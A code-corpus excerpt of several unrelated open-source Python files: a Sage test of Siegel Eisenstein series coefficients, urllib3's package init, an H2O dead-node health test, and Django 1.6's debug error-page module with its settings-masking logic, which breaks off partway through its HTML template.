es1 = sess(weight=k, degree=1)
self.assertTrue(all(es[a] == es1.fourier_coefficient(matrix([[a]]))
for a in range(11)))
def test_degree_1(self):
'''
Test Fourier coefficients of Siegel Eisenstein series of degree 1.
'''
for k in [4, 6, 8, 10]:
self.assert_degree_1(k)
def assert_degree_2(self, k):
es = eisenstein_series_degree2(k, prec=10)
es1 = sess(weight=k, degree=2)
self.assertTrue(
all(es[(n, r, m)] == es1.fourier_coefficient(matrix([[n, ZZ(r) / ZZ(2)],
[ZZ(r) / ZZ(2), m]]))
for n, r, m in es.prec))
def test_degree_2(self):
'''
Test Fourier coefficients of Siegel Eisenstein series of degree 2.
'''
for k in [4, 6, 8, 10]:
self.assert_degree_2(k)
suite = unittest.TestLoader().loadTestsFromTestCase(ForierCoeffsLowDegrees)
unittest.TextTestRunner(verbosity=2).run(suite)
|
JFriel/honours_project
|
refs/heads/master
|
venv/lib/python2.7/site-packages/requests/packages/urllib3/__init__.py
|
360
|
"""
urllib3 - Thread-safe connection pooling and re-using.
"""
from __future__ import absolute_import
import warnings
from .connectionpool import (
HTTPConnectionPool,
HTTPSConnectionPool,
connection_from_url
)
from . import exceptions
from .filepost import encode_multipart_formdata
from .poolmanager import PoolManager, ProxyManager, proxy_from_url
from .response import HTTPResponse
from .util.request import make_headers
from .util.url import get_host
from .util.timeout import Timeout
from .util.retry import Retry
# Set default logging handler to avoid "No handler found" warnings.
import logging
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
__author__ = 'Andrey Petrov (andrey.petrov@shazow.net)'
__license__ = 'MIT'
__version__ = '1.16'
__all__ = (
'HTTPConnectionPool',
'HTTPSConnectionPool',
'PoolManager',
'ProxyManager',
'HTTPResponse',
'Retry',
'Timeout',
'add_stderr_logger',
'connection_from_url',
'disable_warnings',
'encode_multipart_formdata',
'get_host',
'make_headers',
'proxy_from_url',
)
logging.getLogger(__name__).addHandler(NullHandler())
def add_stderr_logger(level=logging.DEBUG):
"""
Helper for quickly adding a StreamHandler to the logger. Useful for
debugging.
Returns the handler after adding it.
"""
# This method needs to be in this __init__.py to get the __name__ correct
# even if urllib3 is vendored within another package.
logger = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
logger.addHandler(handler)
logger.setLevel(level)
logger.debug('Added a stderr logging handler to logger: %s', __name__)
return handler
# ... Clean up.
del NullHandler
# All warning filters *must* be appended unless you're really certain that they
# shouldn't be: otherwise, it's very hard for users to use most Python
# mechanisms to silence them.
# SecurityWarning's always go off by default.
warnings.simplefilter('always', exceptions.SecurityWarning, append=True)
# SubjectAltNameWarning's should go off once per host
warnings.simplefilter('default', exceptions.SubjectAltNameWarning, append=True)
# InsecurePlatformWarning's don't vary between requests, so we keep it default.
warnings.simplefilter('default', exceptions.InsecurePlatformWarning,
append=True)
# SNIMissingWarnings should go off only once.
warnings.simplefilter('default', exceptions.SNIMissingWarning, append=True)
def disable_warnings(category=exceptions.HTTPWarning):
"""
Helper for quickly disabling all urllib3 warnings.
"""
warnings.simplefilter('ignore', category)
|
h2oai/h2o-2
|
refs/heads/master
|
py/testdir_multi_jvm/test_dead_node_status.py
|
9
|
import unittest, time, sys
sys.path.extend(['.','..','../..','py'])
import h2o_browse as h2b
import h2o, h2o_util, h2o_log
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
h2o.init(3)
@classmethod
def tearDownClass(cls):
# time.sleep(3600)
h2o.tear_down_cloud()
def test_dead_node_status(self):
# view logs using each node
h2b.browseTheCloud()
for h in h2o.nodes:
h.log_view()
# terminate node 1
h2o.nodes[1].terminate_self_only()
# remember which is [1] so we can check cloud state correctly
badPort = "/" + str(h2o.nodes[1].http_addr) + ":" + str(h2o.nodes[1].port)
nodeList = h2o.nodes[:] # copy
del nodeList[1] # 1 is dead now
print "We probably need some status to interrogate to understand a node is in red state?"
print "And I probably need to wait 60 secs to get to red state"
time.sleep(120)
# h2o.verify_cloud_size(nodeList, verbose=True, ignoreHealth=True)
# time.sleep(5)
# h2o.verify_cloud_size(nodeList, verbose=True, ignoreHealth=True)
# time.sleep(5)
# h2o.verify_cloud_size(nodeList, verbose=True, ignoreHealth=True)
# just check that node_healthy' goes 'false' on that node
# and 'cloud_healthy' goes false
# everyone should see the same stuff (0 and 2, 1 won't respond)
for n in (0,2):
c = h2o.nodes[n].get_cloud()
# the node order doesn't match our node order
for i in range(3):
expected = c['nodes'][i]['name']!=badPort
self.assertEqual(c['nodes'][i]['node_healthy'], expected)
self.assertEqual(c['cloud_healthy'], False, msg="node %s shouldn't think the cloud is healthy: %s" % (n, c['cloud_healthy']))
if __name__ == '__main__':
h2o.unit_main()
|
dulems/hue
|
refs/heads/master
|
desktop/core/ext-py/Django-1.6.10/django/views/debug.py
|
98
|
from __future__ import unicode_literals
import datetime
import os
import re
import sys
import types
from django.conf import settings
from django.http import (HttpResponse, HttpResponseServerError,
HttpResponseNotFound, HttpRequest, build_request_repr)
from django.template import Template, Context, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.utils.datastructures import MultiValueDict
from django.utils.html import escape
from django.utils.encoding import force_bytes, smart_text
from django.utils.module_loading import import_by_path
from django.utils import six
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|PROFANITIES_LIST|SIGNATURE')
CLEANSED_SUBSTITUTE = '********************'
def linebreak_iter(template_source):
yield 0
p = template_source.find('\n')
while p >= 0:
yield p+1
p = template_source.find('\n', p+1)
yield len(template_source) + 1
def cleanse_setting(key, value):
"""Cleanse an individual setting key/value of sensitive content.
If the value is a dictionary, recursively cleanse the keys in
that dictionary.
"""
try:
if HIDDEN_SETTINGS.search(key):
cleansed = CLEANSED_SUBSTITUTE
else:
if isinstance(value, dict):
cleansed = dict((k, cleanse_setting(k, v)) for k,v in value.items())
else:
cleansed = value
except TypeError:
# If the key isn't regex-able, just return as-is.
cleansed = value
return cleansed
def get_safe_settings():
"Returns a dictionary of the settings module, with sensitive settings blurred out."
settings_dict = {}
for k in dir(settings):
if k.isupper():
settings_dict[k] = cleanse_setting(k, getattr(settings, k))
return settings_dict
def technical_500_response(request, exc_type, exc_value, tb):
"""
Create a technical server error response. The last three arguments are
the values returned from sys.exc_info() and friends.
"""
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
if request.is_ajax():
text = reporter.get_traceback_text()
return HttpResponseServerError(text, content_type='text/plain')
else:
html = reporter.get_traceback_html()
return HttpResponseServerError(html, content_type='text/html')
# Cache for the default exception reporter filter instance.
default_exception_reporter_filter = None
def get_exception_reporter_filter(request):
global default_exception_reporter_filter
if default_exception_reporter_filter is None:
# Load the default filter for the first time and cache it.
default_exception_reporter_filter = import_by_path(
settings.DEFAULT_EXCEPTION_REPORTER_FILTER)()
if request:
return getattr(request, 'exception_reporter_filter', default_exception_reporter_filter)
else:
return default_exception_reporter_filter
class ExceptionReporterFilter(object):
"""
Base for all exception reporter filter classes. All overridable hooks
contain lenient default behaviors.
"""
def get_request_repr(self, request):
if request is None:
return repr(None)
else:
return build_request_repr(request, POST_override=self.get_post_parameters(request))
def get_post_parameters(self, request):
if request is None:
return {}
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
return list(six.iteritems(tb_frame.f_locals))
class SafeExceptionReporterFilter(ExceptionReporterFilter):
"""
Use annotations made by the sensitive_post_parameters and
sensitive_variables decorators to filter out sensitive information.
"""
def is_active(self, request):
"""
This filter is to add safety in production environments (i.e. DEBUG
is False). If DEBUG is True then your site is not safe anyway.
This hook is provided as a convenience to easily activate or
deactivate the filter on a per request basis.
"""
return settings.DEBUG is False
def get_cleansed_multivaluedict(self, request, multivaluedict):
"""
Replaces the keys in a MultiValueDict marked as sensitive with stars.
This mitigates leaking sensitive POST parameters if something like
request.POST['nonexistent_key'] throws an exception (#21098).
"""
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
multivaluedict = multivaluedict.copy()
for param in sensitive_post_parameters:
if param in multivaluedict:
multivaluedict[param] = CLEANSED_SUBSTITUTE
return multivaluedict
def get_post_parameters(self, request):
"""
Replaces the values of POST parameters marked as sensitive with
stars (*********).
"""
if request is None:
return {}
else:
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
cleansed = request.POST.copy()
if sensitive_post_parameters == '__ALL__':
# Cleanse all parameters.
for k, v in cleansed.items():
cleansed[k] = CLEANSED_SUBSTITUTE
return cleansed
else:
# Cleanse only the specified parameters.
for param in sensitive_post_parameters:
if param in cleansed:
cleansed[param] = CLEANSED_SUBSTITUTE
return cleansed
else:
return request.POST
def cleanse_special_types(self, request, value):
if isinstance(value, HttpRequest):
# Cleanse the request's POST parameters.
value = self.get_request_repr(value)
elif isinstance(value, MultiValueDict):
# Cleanse MultiValueDicts (request.POST is the one we usually care about)
value = self.get_cleansed_multivaluedict(request, value)
return value
def get_traceback_frame_variables(self, request, tb_frame):
"""
Replaces the values of variables marked as sensitive with
stars (*********).
"""
# Loop through the frame's callers to see if the sensitive_variables
# decorator was used.
current_frame = tb_frame.f_back
sensitive_variables = None
while current_frame is not None:
if (current_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in current_frame.f_locals):
# The sensitive_variables decorator was used, so we take note
# of the sensitive variables' names.
wrapper = current_frame.f_locals['sensitive_variables_wrapper']
sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
break
current_frame = current_frame.f_back
cleansed = {}
if self.is_active(request) and sensitive_variables:
if sensitive_variables == '__ALL__':
# Cleanse all variables
for name, value in tb_frame.f_locals.items():
cleansed[name] = CLEANSED_SUBSTITUTE
else:
# Cleanse specified variables
for name, value in tb_frame.f_locals.items():
if name in sensitive_variables:
value = CLEANSED_SUBSTITUTE
else:
value = self.cleanse_special_types(request, value)
cleansed[name] = value
else:
# Potentially cleanse the request and any MultiValueDicts if they
# are one of the frame variables.
for name, value in tb_frame.f_locals.items():
cleansed[name] = self.cleanse_special_types(request, value)
if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in tb_frame.f_locals):
# For good measure, obfuscate the decorated function's arguments in
# the sensitive_variables decorator's frame, in case the variables
# associated with those arguments were meant to be obfuscated from
# the decorated function's frame.
cleansed['func_args'] = CLEANSED_SUBSTITUTE
cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
return cleansed.items()
class ExceptionReporter(object):
"""
A class to organize and coordinate reporting on exceptions.
"""
def __init__(self, request, exc_type, exc_value, tb, is_email=False):
self.request = request
self.filter = get_exception_reporter_filter(self.request)
self.exc_type = exc_type
self.exc_value = exc_value
self.tb = tb
self.is_email = is_email
self.template_info = None
self.template_does_not_exist = False
self.loader_debug_info = None
# Handle deprecated string exceptions
if isinstance(self.exc_type, six.string_types):
self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
self.exc_type = type(self.exc_value)
def format_path_status(self, path):
if not os.path.exists(path):
return "File does not exist"
if not os.path.isfile(path):
return "Not a file"
if not os.access(path, os.R_OK):
return "File is not readable"
return "File exists"
def get_traceback_data(self):
"Return a Context instance containing traceback information."
if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
from django.template.loader import template_source_loaders
self.template_does_not_exist = True
self.loader_debug_info = []
# If the template_source_loaders haven't been populated yet, you need
# to provide an empty list for this for loop to not fail.
if template_source_loaders is None:
template_source_loaders = []
for loader in template_source_loaders:
try:
source_list_func = loader.get_template_sources
# NOTE: This assumes exc_value is the name of the template that
# the loader attempted to load.
template_list = [{
'name': t,
'status': self.format_path_status(t),
} for t in source_list_func(str(self.exc_value))]
except AttributeError:
template_list = []
loader_name = loader.__module__ + '.' + loader.__class__.__name__
self.loader_debug_info.append({
'loader': loader_name,
'templates': template_list,
})
if (settings.TEMPLATE_DEBUG and
hasattr(self.exc_value, 'django_template_source')):
self.get_template_exception_info()
frames = self.get_traceback_frames()
for i, frame in enumerate(frames):
if 'vars' in frame:
frame['vars'] = [(k, force_escape(pprint(v))) for k, v in frame['vars']]
frames[i] = frame
unicode_hint = ''
if self.exc_type and issubclass(self.exc_type, UnicodeError):
start = getattr(self.exc_value, 'start', None)
end = getattr(self.exc_value, 'end', None)
if start is not None and end is not None:
unicode_str = self.exc_value.args[1]
unicode_hint = smart_text(unicode_str[max(start-5, 0):min(end+5, len(unicode_str))], 'ascii', errors='replace')
from django import get_version
c = {
'is_email': self.is_email,
'unicode_hint': unicode_hint,
'frames': frames,
'request': self.request,
'filtered_POST': self.filter.get_post_parameters(self.request),
'settings': get_safe_settings(),
'sys_executable': sys.executable,
'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
'server_time': datetime.datetime.now(),
'django_version_info': get_version(),
'sys_path' : sys.path,
'template_info': self.template_info,
'template_does_not_exist': self.template_does_not_exist,
'loader_debug_info': self.loader_debug_info,
}
# Check whether exception info is available
if self.exc_type:
c['exception_type'] = self.exc_type.__name__
if self.exc_value:
c['exception_value'] = smart_text(self.exc_value, errors='replace')
if frames:
c['lastframe'] = frames[-1]
return c
def get_traceback_html(self):
"Return HTML version of debug 500 HTTP error page."
t = Template(TECHNICAL_500_TEMPLATE, name='Technical 500 template')
c = Context(self.get_traceback_data())
return t.render(c)
def get_traceback_text(self):
"Return plain text version of debug 500 HTTP error page."
t = Template(TECHNICAL_500_TEXT_TEMPLATE, name='Technical 500 template')
c = Context(self.get_traceback_data(), autoescape=False)
return t.render(c)
def get_template_exception_info(self):
origin, (start, end) = self.exc_value.django_template_source
template_source = origin.reload()
context_lines = 10
line = 0
upto = 0
source_lines = []
before = during = after = ""
for num, next in enumerate(linebreak_iter(template_source)):
if start >= upto and end <= next:
line = num
before = escape(template_source[upto:start])
during = escape(template_source[start:end])
after = escape(template_source[end:next])
source_lines.append( (num, escape(template_source[upto:next])) )
upto = next
total = len(source_lines)
top = max(1, line - context_lines)
bottom = min(total, line + 1 + context_lines)
# In some rare cases, exc_value.args might be empty.
try:
message = self.exc_value.args[0]
except IndexError:
message = '(Could not get exception message)'
self.template_info = {
'message': message,
'source_lines': source_lines[top:bottom],
'before': before,
'during': during,
'after': after,
'top': top,
'bottom': bottom,
'total': total,
'line': line,
'name': origin.name,
}
def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
source = None
if loader is not None and hasattr(loader, "get_source"):
try:
source = loader.get_source(module_name)
except ImportError:
pass
if source is not None:
source = source.splitlines()
if source is None:
try:
with open(filename, 'rb') as fp:
source = fp.read().splitlines()
except (OSError, IOError):
pass
if source is None:
return None, [], None, []
# If we just read the source from a file, or if the loader did not
# apply tokenize.detect_encoding to decode the source into a Unicode
# string, then we should do that ourselves.
if isinstance(source[0], six.binary_type):
encoding = 'ascii'
for line in source[:2]:
# File coding may be specified. Match pattern from PEP-263
# (http://www.python.org/dev/peps/pep-0263/)
match = re.search(br'coding[:=]\s*([-\w.]+)', line)
if match:
encoding = match.group(1).decode('ascii')
break
source = [six.text_type(sline, encoding, 'replace') for sline in source]
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = source[lower_bound:lineno]
context_line = source[lineno]
post_context = source[lineno+1:upper_bound]
return lower_bound, pre_context, context_line, post_context
def get_traceback_frames(self):
frames = []
tb = self.tb
while tb is not None:
# Support for __traceback_hide__ which is used by a few libraries
# to hide internal frames.
if tb.tb_frame.f_locals.get('__traceback_hide__'):
tb = tb.tb_next
continue
filename = tb.tb_frame.f_code.co_filename
function = tb.tb_frame.f_code.co_name
lineno = tb.tb_lineno - 1
loader = tb.tb_frame.f_globals.get('__loader__')
module_name = tb.tb_frame.f_globals.get('__name__') or ''
pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(filename, lineno, 7, loader, module_name)
if pre_context_lineno is not None:
frames.append({
'tb': tb,
'type': 'django' if module_name.startswith('django.') else 'user',
'filename': filename,
'function': function,
'lineno': lineno + 1,
'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
'id': id(tb),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno + 1,
})
tb = tb.tb_next
return frames
def format_exception(self):
"""
Return the same data as from traceback.format_exception.
"""
import traceback
frames = self.get_traceback_frames()
tb = [ (f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames ]
list = ['Traceback (most recent call last):\n']
list += traceback.format_list(tb)
list += traceback.format_exception_only(self.exc_type, self.exc_value)
return list
def technical_404_response(request, exception):
"Create a technical 404 error response. The exception should be the Http404."
try:
tried = exception.args[0]['tried']
except (IndexError, TypeError, KeyError):
tried = []
else:
if (not tried # empty URLconf
or (request.path == '/'
and len(tried) == 1 # default URLconf
and len(tried[0]) == 1
and getattr(tried[0][0], 'app_name', '') == getattr(tried[0][0], 'namespace', '') == 'admin')):
return default_urlconf(request)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
if isinstance(urlconf, types.ModuleType):
urlconf = urlconf.__name__
t = Template(TECHNICAL_404_TEMPLATE, name='Technical 404 template')
c = Context({
'urlconf': urlconf,
'root_urlconf': settings.ROOT_URLCONF,
'request_path': request.path_info[1:], # Trim leading slash
'urlpatterns': tried,
'reason': force_bytes(exception, errors='replace'),
'request': request,
'settings': get_safe_settings(),
})
return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
"Create an empty URLconf 404 error response."
t = Template(DEFAULT_URLCONF_TEMPLATE, name='Default URLconf template')
c = Context({})
return HttpResponse(t.render(c), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 0 20px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block' : 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.innerHTML = link.innerHTML == s1 ? s2 : s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception message supplied{% endif %}</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if loader_debug_info %}
<p>Django tried loading these templates, in this order:</p>
<ul>
{% for loader in loader_debug_info %}
<li>Using loader <code>{{ loader.loader }}</code>:
<ul>
{% for t in loader.templates %}<li><code>{{ t.name }}</code> ({{ t.status }})</li>{% endfor %}
</ul>
</li>
{% endfor %}
</ul>
{% else %}
<p>Django couldn't find any templates because your <code>TEMPLATE_LOADERS</code> setting is empty!</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}{% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}">
{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>{{ template_info.before }}<span class="specific">{{ template_info.during }}</span>{{ template_info.after }}</td></tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endifequal %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">Switch to copy-and-paste view</a></span>{% endif %}</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">{% for line in frame.pre_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line"><li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">{% for line in frame.post_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:"0" %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title" value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template Loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} ({{ t.status }})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}
Traceback:
{% for frame in frames %}File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}
{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public Web site">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.GET.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in filtered_POST.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.FILES.items %}
<tr>
